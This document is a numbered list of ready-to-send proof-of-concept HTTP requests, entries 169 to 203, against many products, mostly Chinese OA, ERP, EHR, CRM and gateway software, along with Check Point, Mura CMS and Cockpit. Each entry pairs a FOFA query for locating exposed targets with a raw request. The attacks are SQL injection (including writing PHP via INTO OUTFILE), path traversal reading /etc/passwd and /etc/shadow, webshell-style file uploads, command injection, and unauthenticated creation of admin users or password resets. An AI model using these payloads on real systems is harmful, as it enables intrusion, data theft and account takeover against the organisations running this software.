169. 宏景 EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
Time-based: a response delayed by about 5 seconds confirms the injection.
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD licence plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
Send the request line verbatim (curl --path-as-is, or a raw repeater); ordinary HTTP clients collapse the leading ../ before the request leaves the host.
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
The body is not form-encoded despite the Content-Type header; send it exactly as shown.
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
The device configuration file is fetched through the login page path; one path per model, the .cfg name being the model:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The stored file takes its name from the part's name attribute (12234.txt), not from filename; fetch it with:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
Error-based: the result of select user() is returned inside the updatexml() XPath error message.
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
Creates the account test1234 with password test1234:
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
The injection is in the token parameter (Oracle, error-based via ctxsys.drithsx.sn); note that the endpoint itself is a password-update call carrying loginid and newpassword, so test requests touch account state.
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
The body is a literal SQL INSERT creating the user root/123456 with PURVIEW 4:
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
Stacked query: after closing the appid value with 3'); it runs SELECT unhex(...) INTO OUTFILE '.\\..\\..\\WebRoot\\plom.xgi'. The hex decodes to <?php echo md5("1"); $file = __FILE__; unlink($file);, a self-deleting probe written into WebRoot.
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: your-ip

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic generation plants.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection (time-based variant of entry 158)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewer system deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (ESAFENET) electronic document security management system: NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP: UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system: setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform: uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system: send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform: password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system: Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system: assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF token and then a cookie, then upload and request the uploaded file to see the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统): dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) omnimedia news gathering and editing system: binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system: AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR: PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--